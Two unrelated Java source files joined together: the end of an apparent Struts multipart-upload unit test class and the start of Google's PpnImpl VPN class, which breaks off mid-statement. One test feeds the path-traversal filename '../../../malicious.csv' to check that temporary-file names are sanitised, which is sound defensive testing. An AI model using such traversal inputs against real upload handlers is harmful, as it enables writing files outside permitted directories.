assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadSizeException"); } @Test public void 
maxFilesSize() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.setMaxFileSize("1"); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadByteCountLimitException"); } @Test public void maxFiles() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.US_ASCII)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.setMaxFiles("1"); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.errors) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadFileCountLimitException"); } @Test public void maxStringLength() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + formField("longText", "very long text") + formField("shortText", "short text") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.setMaxStringLength("10"); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.parameter.too.long"); } @Test public void mismatchCharset() throws IOException { // give String content = formFile("file1", "test1.csv", "Ł,Ś,Ż,Ó") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); 
assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setDefaultEncoding(StandardCharsets.ISO_8859_1.name()); multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("Ł,Ś,Ż,Ó"); }); } @Test public void normalFields() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + formField("longText", "very long text") + formField("shortText", "short text") + formField("multi", "multi1") + formField("multi", "multi2") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getParameterNames().asIterator()).toIterable() .containsOnly("longText", "shortText", "multi"); assertThat(multiPart.getParameterValues("longText")) .contains("very long text"); assertThat(multiPart.getParameterValues("shortText")) .contains("short text"); assertThat(multiPart.getParameter("longText")) .isEqualTo("very long text"); assertThat(multiPart.getParameter("shortText")) .isEqualTo("short text"); assertThat(multiPart.getParameterValues("multi")) .containsOnly("multi1", "multi2"); assertThat(multiPart.getParameterValues("not-existing")) .isNull(); } @Test public void unableParseRequest() throws IOException { String content = formFile("file1", "test1.csv", 
"1,2,3,4"); mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadException"); } @Test public void cleanupDoesNotClearErrorsList() throws IOException { // given - create a scenario that generates errors String content = formFile("file1", "test1.csv", "1,2,3,4"); mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); multiPart.setMaxSize("1"); // Very small to trigger error multiPart.parse(mockRequest, tempDir); // Verify errors exist assertThat(multiPart.getErrors()).isNotEmpty(); int originalErrorCount = multiPart.getErrors().size(); // when multiPart.cleanUp(); // then - errors should remain (cleanup doesn't clear errors) assertThat(multiPart.getErrors()).hasSize(originalErrorCount); } @Test public void largeFileUploadHandling() throws IOException { // Test that large files are handled properly StringBuilder largeContent = new StringBuilder(); for (int i = 0; i < 1000; i++) { largeContent.append("line").append(i).append(","); } String content = formFile("largefile", "large.csv", largeContent.toString()) + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - should complete without memory issues assertThat(multiPart.getErrors()).isEmpty(); assertThat(multiPart.getFile("largefile")).hasSize(1); // Cleanup should properly handle large files multiPart.cleanUp(); assertThat(multiPart.uploadedFiles).isEmpty(); } @Test public void multipleFileUploadWithMixedContent() throws IOException { // Test mixed content with multiple files and parameters String content = formFile("file1", "test1.csv", "1,2,3,4") + formField("param1", "value1") + formFile("file2", "test2.csv", "5,6,7,8") + formField("param2", 
"value2") + formFile("file3", "test3.csv", "9,10,11,12") + formField("param3", "value3") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - verify all content was processed assertThat(multiPart.getErrors()).isEmpty(); assertThat(multiPart.getFile("file1")).hasSize(1); assertThat(multiPart.getFile("file2")).hasSize(1); assertThat(multiPart.getFile("file3")).hasSize(1); assertThat(multiPart.getParameter("param1")).isEqualTo("value1"); assertThat(multiPart.getParameter("param2")).isEqualTo("value2"); assertThat(multiPart.getParameter("param3")).isEqualTo("value3"); // Store file paths for post-cleanup verification List<String> filePaths = new ArrayList<>(); for (UploadedFile file : multiPart.getFile("file1")) { filePaths.add(file.getAbsolutePath()); } for (UploadedFile file : multiPart.getFile("file2")) { filePaths.add(file.getAbsolutePath()); } for (UploadedFile file : multiPart.getFile("file3")) { filePaths.add(file.getAbsolutePath()); } // when - cleanup multiPart.cleanUp(); // then - verify complete cleanup assertThat(multiPart.uploadedFiles).isEmpty(); assertThat(multiPart.parameters).isEmpty(); // Verify files are deleted for (String filePath : filePaths) { assertThat(new File(filePath)).doesNotExist(); } } @Test public void createTemporaryFileGeneratesSecureNames() { // Create a test instance to access the protected method AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create multiple temporary files File tempFile1 = testRequest.createTemporaryFile("test1.csv", testLocation); File tempFile2 = testRequest.createTemporaryFile("test2.csv", testLocation); File tempFile3 = testRequest.createTemporaryFile("../../../malicious.csv", testLocation); // then - verify secure naming assertThat(tempFile1.getName()).startsWith("upload_"); assertThat(tempFile1.getName()).endsWith(".tmp"); 
assertThat(tempFile2.getName()).startsWith("upload_"); assertThat(tempFile2.getName()).endsWith(".tmp"); assertThat(tempFile3.getName()).startsWith("upload_"); assertThat(tempFile3.getName()).endsWith(".tmp"); // Verify each file has a unique name assertThat(tempFile1.getName()).isNotEqualTo(tempFile2.getName()); assertThat(tempFile2.getName()).isNotEqualTo(tempFile3.getName()); assertThat(tempFile1.getName()).isNotEqualTo(tempFile3.getName()); // Verify all files are in the correct location assertThat(tempFile1.getParent()).isEqualTo(tempDir); assertThat(tempFile2.getParent()).isEqualTo(tempDir); assertThat(tempFile3.getParent()).isEqualTo(tempDir); // Verify malicious filename doesn't affect the location assertThat(tempFile3.getName()).doesNotContain(".."); assertThat(tempFile3.getName()).doesNotContain("/"); assertThat(tempFile3.getName()).doesNotContain("\\"); // Clean up test files tempFile1.delete(); tempFile2.delete(); tempFile3.delete(); } @Test public void createTemporaryFileInSpecificDirectory() throws IOException { // Create a subdirectory for testing Path subDir = Paths.get(tempDir, "subdir"); Files.createDirectories(subDir); AbstractMultiPartRequest testRequest = createMultipartRequest(); // when File tempFile = testRequest.createTemporaryFile("test.csv", subDir); // then - verify file is created in the specified subdirectory assertThat(tempFile.getParent()).isEqualTo(subDir.toString()); assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); // Clean up tempFile.delete(); Files.delete(subDir); } @Test public void createTemporaryFileWithNullFileName() throws IOException { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create temp file with null filename File tempFile = testRequest.createTemporaryFile(null, testLocation); // then - should still create a valid temporary file assertThat(tempFile.getName()).startsWith("upload_"); 
assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Clean up tempFile.delete(); } @Test public void createTemporaryFileWithEmptyFileName() throws IOException { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create temp file with empty filename File tempFile = testRequest.createTemporaryFile("", testLocation); // then - should still create a valid temporary file assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Clean up tempFile.delete(); } @Test public void createTemporaryFileWithSpecialCharacters() { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create temp files with various special characters File tempFile1 = testRequest.createTemporaryFile("file with spaces.csv", testLocation); File tempFile2 = testRequest.createTemporaryFile("file@#$%^&*().csv", testLocation); File tempFile3 = testRequest.createTemporaryFile("файл.csv", testLocation); // Cyrillic // then - all should create valid secure temporary files File[] tempFiles = {tempFile1, tempFile2, tempFile3}; for (File tempFile : tempFiles) { assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Verify no special characters leak into the actual filename assertThat(tempFile.getName()).matches("upload_[a-zA-Z0-9_]+\\.tmp"); } // All should have unique names assertThat(tempFile1.getName()).isNotEqualTo(tempFile2.getName()); assertThat(tempFile2.getName()).isNotEqualTo(tempFile3.getName()); assertThat(tempFile1.getName()).isNotEqualTo(tempFile3.getName()); // Clean up tempFile1.delete(); tempFile2.delete(); tempFile3.delete(); } @Test public void createTemporaryFileConsistentNaming() { AbstractMultiPartRequest testRequest 
= createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create many temporary files to verify naming consistency List<File> tempFiles = new ArrayList<>(); for (int i = 0; i < 100; i++) { tempFiles.add(testRequest.createTemporaryFile("test" + i + ".csv", testLocation)); } // then - all should follow the same naming pattern for (File tempFile : tempFiles) { assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Verify UUID pattern (without hyphens, replaced with underscores) assertThat(tempFile.getName()).matches("upload_[a-zA-Z0-9_]+\\.tmp"); } // Verify all names are unique List<String> fileNames = tempFiles.stream().map(File::getName).toList(); assertThat(fileNames).doesNotHaveDuplicates(); // Clean up tempFiles.forEach(File::delete); } @Test public void emptyFileUploadsAreRejected() throws IOException { // Test that empty files (0 bytes) are rejected with proper error message String content = endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"emptyfile\"; filename=\"empty.txt\"" + endline + "Content-Type: text/plain" + endline + endline + // No content - this creates a 0-byte file endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - should reject empty file and add error assertThat(multiPart.getErrors()) .hasSize(1) .first() .satisfies(error -> { assertThat(error.getTextKey()).isEqualTo("struts.messages.upload.error.IllegalArgumentException"); assertThat(error.getArgs()).containsExactly("empty.txt", "emptyfile"); }); assertThat(multiPart.uploadedFiles).isEmpty(); assertThat(multiPart.getFile("emptyfile")).isEmpty(); } @Test public void mixedEmptyAndValidFilesProcessedCorrectly() throws IOException { // Test that valid files are processed while empty files are rejected String content = endline + "--" + boundary 
+ endline + "Content-Disposition: form-data; name=\"emptyfile1\"; filename=\"empty1.txt\"" + endline + "Content-Type: text/plain" + endline + endline + // No content - empty file endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"validfile\"; filename=\"valid.txt\"" + endline + "Content-Type: text/plain" + endline + endline + "some valid content" + endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"emptyfile2\"; filename=\"empty2.txt\"" + endline + "Content-Type: application/octet-stream" + endline + endline + // Another empty file endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - should have 2 errors for empty files, 1 valid file processed assertThat(multiPart.getErrors()).hasSize(2); assertThat(multiPart.getErrors().get(0)) .satisfies(error -> { assertThat(error.getTextKey()).isEqualTo("struts.messages.upload.error.IllegalArgumentException"); assertThat(error.getArgs()).containsExactly("empty1.txt", "emptyfile1"); }); assertThat(multiPart.getErrors().get(1)) .satisfies(error -> { assertThat(error.getTextKey()).isEqualTo("struts.messages.upload.error.IllegalArgumentException"); assertThat(error.getArgs()).containsExactly("empty2.txt", "emptyfile2"); }); // Only the valid file should be processed assertThat(multiPart.uploadedFiles).hasSize(1); assertThat(multiPart.getFile("validfile")).hasSize(1); assertThat(multiPart.getFile("emptyfile1")).isEmpty(); assertThat(multiPart.getFile("emptyfile2")).isEmpty(); // Verify valid file content assertThat(multiPart.getFile("validfile")[0].getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .content() .isEqualTo("some valid content"); } @Test public void emptyFileTemporaryFileCleanup() throws IOException { // Test that temporary files for empty files are properly cleaned up String content = endline + "--" + boundary + endline + "Content-Disposition: form-data; 
name=\"emptyfile\"; filename=\"empty.txt\"" + endline + "Content-Type: text/plain" + endline + endline + // Empty file endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // Count temp files before processing File[] tempFilesBefore = new File(tempDir).listFiles((dir, name) -> name.startsWith("upload_") && name.endsWith(".tmp")); int countBefore = tempFilesBefore != null ? tempFilesBefore.length : 0; // when multiPart.parse(mockRequest, tempDir); // then - should reject empty file and clean up temp file assertThat(multiPart.getErrors()).hasSize(1); assertThat(multiPart.uploadedFiles).isEmpty(); // Verify that temporary files are cleaned up (may have implementation differences) // Some implementations create temp files first, others don't create any for empty uploads File[] tempFilesAfter = new File(tempDir).listFiles((dir, name) -> name.startsWith("upload_") && name.endsWith(".tmp")); int countAfter = tempFilesAfter != null ? tempFilesAfter.length : 0; // Allow for implementation differences - just ensure no new temp files remain assertThat(countAfter).isLessThanOrEqualTo(countBefore); } protected String formFile(String fieldName, String filename, String content) { return endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"" + fieldName + "\"; filename=\"" + filename + "\"" + endline + "Content-Type: text/csv" + endline + endline + content; } protected String formField(String fieldName, String content) { return endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"" + fieldName + "\"" + endline + endline + content; } }
google/vpn-libraries
35,800
android/src/main/java/com/google/android/libraries/privacy/ppn/internal/PpnImpl.java
// Copyright 2020 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.android.libraries.privacy.ppn.internal; import static com.google.android.libraries.privacy.ppn.internal.http.HttpFetcher.DNS_CACHE_TIMEOUT; import static com.google.android.libraries.privacy.ppn.internal.http.HttpFetcher.DNS_LOOKUP_TIMEOUT; import android.accounts.Account; import android.app.Notification; import android.content.Context; import android.content.Intent; import android.net.ConnectivityManager; import android.net.LinkProperties; import android.net.Network; import android.net.VpnService; import android.os.Build; import android.os.Handler; import android.os.Looper; import android.util.Log; import androidx.annotation.Nullable; import androidx.annotation.VisibleForTesting; import com.google.android.gms.tasks.Task; import com.google.android.gms.tasks.TaskCompletionSource; import com.google.android.gms.tasks.TaskExecutors; import com.google.android.libraries.privacy.ppn.BypassOptions; import com.google.android.libraries.privacy.ppn.Dns; import com.google.android.libraries.privacy.ppn.IpGeoLevel; import com.google.android.libraries.privacy.ppn.Ppn; import com.google.android.libraries.privacy.ppn.PpnAccountManager; import com.google.android.libraries.privacy.ppn.PpnConnectingStatus; import com.google.android.libraries.privacy.ppn.PpnConnectionStatus; import com.google.android.libraries.privacy.ppn.PpnDisconnectionStatus; import 
com.google.android.libraries.privacy.ppn.PpnException; import com.google.android.libraries.privacy.ppn.PpnListener; import com.google.android.libraries.privacy.ppn.PpnOptions; import com.google.android.libraries.privacy.ppn.PpnReconnectionStatus; import com.google.android.libraries.privacy.ppn.PpnResumeStatus; import com.google.android.libraries.privacy.ppn.PpnSnoozeStatus; import com.google.android.libraries.privacy.ppn.PpnStatus; import com.google.android.libraries.privacy.ppn.PpnStatus.Code; import com.google.android.libraries.privacy.ppn.PpnTelemetry; import com.google.android.libraries.privacy.ppn.internal.http.CachedDns; import com.google.android.libraries.privacy.ppn.internal.http.HttpFetcher; import com.google.android.libraries.privacy.ppn.internal.service.PpnServiceDebugJson; import com.google.android.libraries.privacy.ppn.internal.service.ProtectedSocketFactoryFactory; import com.google.android.libraries.privacy.ppn.internal.service.VpnBypassDns; import com.google.android.libraries.privacy.ppn.internal.service.VpnManager; import com.google.android.libraries.privacy.ppn.krypton.Krypton; import com.google.android.libraries.privacy.ppn.krypton.KryptonException; import com.google.android.libraries.privacy.ppn.krypton.KryptonFactory; import com.google.android.libraries.privacy.ppn.krypton.KryptonImpl; import com.google.android.libraries.privacy.ppn.krypton.KryptonIpSecHelper; import com.google.android.libraries.privacy.ppn.krypton.KryptonIpSecHelperImpl; import com.google.android.libraries.privacy.ppn.krypton.KryptonListener; import com.google.android.libraries.privacy.ppn.krypton.OAuthTokenProvider; import com.google.android.libraries.privacy.ppn.xenon.PpnNetwork; import com.google.android.libraries.privacy.ppn.xenon.PpnNetworkListener; import com.google.android.libraries.privacy.ppn.xenon.Xenon; import com.google.android.libraries.privacy.ppn.xenon.impl.XenonImpl; import com.google.android.libraries.privacy.ppn.xenon.impl.v2.XenonV2Impl; import 
com.google.common.util.concurrent.Futures; import com.google.common.util.concurrent.ListenableFuture; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.errorprone.annotations.ResultIgnorabilityUnspecified; import java.time.Duration; import java.util.Collections; import java.util.HashSet; import java.util.Optional; import java.util.Set; import java.util.concurrent.ExecutorService; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicBoolean; import org.json.JSONObject; /** A PPN implementation built on top of GCS. */ public class PpnImpl implements Ppn, KryptonListener, PpnNetworkListener { private static final String TAG = "PpnImpl"; // By default, keep the Krypton stopped status as "unknown" when Krypton is running, since the // default value will only be used if the Service is somehow stopped without the VPN first being // revoked or stopped by Krypton. private static final PpnStatus KRYPTON_STOPPED_STATUS_UNKNOWN = new PpnStatus.Builder(Code.UNKNOWN, "Service was stopped while Krypton was still running.") .build(); private final Context context; /* Executor for any work that PPN needs to do off the UI thread. */ private final ExecutorService backgroundExecutor; private final VpnManager vpnManager; private final HttpFetcher httpFetcher; private final PpnNotificationManager notificationManager; private final PpnAccountManager accountManager; private PpnTelemetryManager telemetry; private final PpnOptions options; @Nullable private PpnListener listener; private final Handler mainHandler = new Handler(Looper.getMainLooper()); @Nullable private Krypton krypton; private final Object kryptonLock = new Object(); private KryptonFactory kryptonFactory; private PpnStatus kryptonStoppedStatus = KRYPTON_STOPPED_STATUS_UNKNOWN; private Xenon xenon; private final VpnMonitor vpnMonitor; // This is lazy-initialized, because it is only created if we are actually using IpSec. 
@Nullable private KryptonIpSecHelper ipSecHelper; // These settings can be changed while PPN is running. private Set<String> disallowedApplications = Collections.emptySet(); // Tracks whether PPN is fully connected, for managing notification state. private final AtomicBoolean connected = new AtomicBoolean(); private final AccountCache accountCache; @Override public void onKryptonPermanentFailure(PpnStatus status) { Log.w(TAG, "Krypton stopped with status: " + status); connected.set(false); stopKryptonAndService(status); } @Override public void onKryptonCrashed() { Log.e(TAG, "Krypton has crashed."); Log.e(TAG, "Clearing notification before pending crash."); notificationManager.stopService(); } @Override public void onKryptonConnected(ConnectionStatus status) { Log.w(TAG, "Krypton connected."); telemetry.notifyConnected(); if (listener == null) { return; } try { PpnConnectionStatus ppnStatus = PpnConnectionStatus.fromProto(status); // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnConnected(ppnStatus)); } catch (PpnException e) { Log.e(TAG, "Invalid status proto.", e); } connected.set(true); } @Override public void onKryptonConnecting(ConnectingStatus status) { Log.w(TAG, "Krypton connecting..."); PpnConnectingStatus connectingStatus = PpnConnectingStatus.fromProto(status); Log.w(TAG, "Krypton connecting status: " + connectingStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. 
mainHandler.post(() -> listener.onPpnConnecting(connectingStatus)); } @Override public void onKryptonControlPlaneConnected() { Log.w(TAG, "Krypton control plane connected."); } @Override public void onKryptonStatusUpdated(ConnectionStatus status) { Log.w(TAG, "Krypton status updated."); if (listener == null) { return; } if (!connected.get()) { Log.w(TAG, "Ignoring connection status update, because Krypton is disconnected."); return; } try { PpnConnectionStatus ppnStatus = PpnConnectionStatus.fromProto(status); Log.w(TAG, "Krypton status: " + ppnStatus); // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnStatusUpdated(ppnStatus)); } catch (PpnException e) { Log.e(TAG, "Invalid status proto.", e); } } @Override public void onKryptonDisconnected(DisconnectionStatus status) { Log.w(TAG, "Krypton disconnected: " + status.getCode() + ": " + status.getMessage()); telemetry.notifyDisconnected(); connected.set(false); // Normally, this should be a no-op. But it's possible that we're failing to connect because // the network we are using no longer exists, and Android forgot to tell us about it. So, we // give Xenon a chance to double-check that the networks it knows about are still valid. xenon.reevaluateNetworks(); PpnDisconnectionStatus ppnStatus = PpnDisconnectionStatus.fromProto(status); Log.w(TAG, "Krypton disconnection status: " + ppnStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. 
mainHandler.post(() -> listener.onPpnDisconnected(ppnStatus)); } @Override public void onKryptonNetworkFailed(PpnStatus status, NetworkInfo networkInfo) { Log.w(TAG, "Krypton network " + networkInfo.getNetworkId() + " failed: " + status); xenon.deprioritize(networkInfo); } @Override public void onKryptonWaitingToReconnect(ReconnectionStatus status) { Log.w(TAG, "Krypton waiting to reconnect..."); PpnReconnectionStatus reconnectionStatus = PpnReconnectionStatus.fromProto(status); Log.w(TAG, "Krypton reconnection status: " + reconnectionStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnWaitingToReconnect(reconnectionStatus)); } @Override public void onKryptonSnoozed(SnoozeStatus status) { Log.w(TAG, "Krypton is snoozed."); Log.w(TAG, "Stopping Xenon for snooze."); try { xenon.stop(); Log.w(TAG, "Stopped Xenon for snooze."); } catch (PpnException e) { Log.e(TAG, "Unable to stop Krypton after PPN is snoozed.", e); } PpnSnoozeStatus snoozeStatus = PpnSnoozeStatus.fromProto(status); Log.w(TAG, "Krypton snooze status: " + snoozeStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnSnoozed(snoozeStatus)); } @Override public void onKryptonResumed(ResumeStatus status) { Log.w(TAG, "Krypton is resumed."); PpnResumeStatus resumeStatus = PpnResumeStatus.fromProto(status); Log.w(TAG, "Krypton resume status: " + resumeStatus); if (listener == null) { return; } Log.w(TAG, "Starting Xenon after resuming from snooze."); try { xenon.start(); Log.w(TAG, "Started Xenon after resuming from snooze."); } catch (PpnException e) { Log.e(TAG, "Unable to start Krypton after Ppn has resumed.", e); } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. 
mainHandler.post(() -> listener.onPpnResumed(resumeStatus)); } @Override public int onKryptonNeedsTunFd(TunFdData tunFdData) throws PpnException { Log.w(TAG, "Krypton requesting TUN fd."); int createTunFdResult = vpnManager.createTunFd(tunFdData); return createTunFdResult; } @Override public int onKryptonNeedsNetworkFd(NetworkInfo network) throws PpnException { Log.w(TAG, "Krypton requesting network fd."); PpnNetwork ppnNetwork = xenon.getNetwork(network.getNetworkId()); if (ppnNetwork == null) { throw new PpnException("Unable to find network with id " + network.getNetworkId()); } return vpnManager.createProtectedDatagramSocket(ppnNetwork); } @Override public int onKryptonNeedsTcpFd(NetworkInfo network) throws PpnException { Log.w(TAG, "Krypton requesting TCP/IP fd."); PpnNetwork ppnNetwork = xenon.getNetwork(network.getNetworkId()); if (ppnNetwork == null) { throw new PpnException("Unable to find network with id " + network.getNetworkId()); } return vpnManager.createProtectedStreamSocket(ppnNetwork); } @Override public void onKryptonNeedsIpSecConfiguration(IpSecTransformParams params) throws PpnException { if (ipSecHelper == null) { ipSecHelper = new KryptonIpSecHelperImpl(context, xenon); } try { ipSecHelper.transformFd( params, this.options.isSocketKeepaliveEnabled(), this::disableKeepalive); } catch (KryptonException e) { throw new PpnException("Unable to configure IpSec.", e); } } private void disableKeepalive() { try { synchronized (kryptonLock) { if (krypton != null) { // TODO: Create a unit test to cover this line. krypton.disableKryptonKeepalive(); } } } catch (KryptonException e) { Log.e(TAG, "Failed to disable the legacy keepalive.", e); } } /** Creates a new instance of the PPN. 
*/ public PpnImpl(Context context, PpnOptions options) { this.context = context.getApplicationContext(); this.options = options; this.backgroundExecutor = options.getBackgroundExecutor(); this.notificationManager = new PpnNotificationManager(); this.telemetry = new PpnTelemetryManager(); this.vpnManager = VpnManager.create(context, options); Dns dns = new VpnBypassDns(vpnManager); if (options.isDnsCacheEnabled()) { dns = new CachedDns(dns, DNS_CACHE_TIMEOUT, DNS_LOOKUP_TIMEOUT, backgroundExecutor); } this.httpFetcher = new HttpFetcher(new ProtectedSocketFactoryFactory(vpnManager), dns); final OAuthTokenProvider oAuthTokenProvider; if (options.isIntegrityAttestationEnabled()) { final AttestationHelper attestationHelper = new AttestationHelper(context, options); oAuthTokenProvider = new OAuthTokenProvider() { @Override public String getOAuthToken() { try { return getZincOAuthToken(); } catch (PpnException e) { Log.e(TAG, "Unable to get Zinc OAuth token.", e); } return ""; } @Override @Nullable public byte[] getAttestationData(String nonce) { return attestationHelper.getAttestationData(nonce, vpnManager.getNetwork()); } @Override public void clearOAuthToken(String token) { clearZincOAuthToken(token); } }; } else { oAuthTokenProvider = new OAuthTokenProvider() { @Override public String getOAuthToken() { try { return getZincOAuthToken(); } catch (PpnException e) { Log.e(TAG, "Unable to get Zinc OAuth Token.", e); } return ""; } @Override @Nullable public byte[] getAttestationData(String nonce) { return null; } @Override public void clearOAuthToken(String token) { clearZincOAuthToken(token); } }; } this.kryptonFactory = (KryptonListener kryptonListener, ExecutorService bgExecutor) -> new KryptonImpl(context, httpFetcher, oAuthTokenProvider, kryptonListener, bgExecutor); this.accountManager = options.getAccountManager().orElseGet(GoogleAccountManager::new); this.accountCache = new AccountCache(context, backgroundExecutor, accountManager); if (options.isXenonV2Enabled()) { 
this.xenon = new XenonV2Impl(context, this, httpFetcher, options); } else { this.xenon = new XenonImpl(context, this, httpFetcher, options); } ConnectivityManager connectivityManager = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE); this.vpnMonitor = new VpnMonitor(connectivityManager); this.disallowedApplications = options.getDisallowedApplications(); PpnLibrary.init(this); } /** Nullifies the cached account used for enabling PPN. */ @VisibleForTesting void clearCachedAccount() { accountCache.clearCachedAccount(); } @Override public void start(Account account) { Log.w(TAG, "PPN status: " + getDebugJson()); accountCache.setAccount(account); // Snapshot the disallowed applications, so that it only changes when PPN is restarted. vpnManager.setDisallowedApplications(disallowedApplications); startVpn(); } @Override public void setAccount(Account account) { Log.w(TAG, "Setting account on PPN."); accountCache.setAccount(account); } @Override public void stop() { // Stopping Krypton requires getting the Krypton lock and waiting for Krypton's threads to be // joined, so we kick it off to the background Executor. 
backgroundExecutor.execute(() -> stopKryptonAndService(PpnStatus.STATUS_OK)); } @Override public ListenableFuture<Void> restart() { Log.w(TAG, "Restarting Ppn."); return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { stopKrypton(); vpnManager.setDisallowedApplications(disallowedApplications); startKrypton(); } } } catch (PpnException e) { Log.e(TAG, "Failed to restart Ppn.", e); throw e; } return null; }, backgroundExecutor); } @Override public ListenableFuture<Void> snooze(Duration snoozeDuration) { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Snoozing krypton connection for " + snoozeDuration.toMillis() + " ms."); krypton.snooze(snoozeDuration.toMillis()); } } } catch (KryptonException e) { Log.e(TAG, "Failed to snooze Ppn for specified duration.", e); throw e; } return null; }, backgroundExecutor); } @Override public ListenableFuture<Void> resume() { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Resuming krypton connection."); krypton.resume(); } } } catch (KryptonException e) { Log.e(TAG, "Failed to resume Ppn after snooze.", e); throw e; } return null; }, backgroundExecutor); } @Override public ListenableFuture<Void> extendSnooze(Duration extendDuration) { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Extending krypton snooze for " + extendDuration.toMillis() + " ms."); krypton.extendSnooze(extendDuration.toMillis()); } } } catch (KryptonException e) { Log.e( TAG, "Failed to extend snooze duration for " + 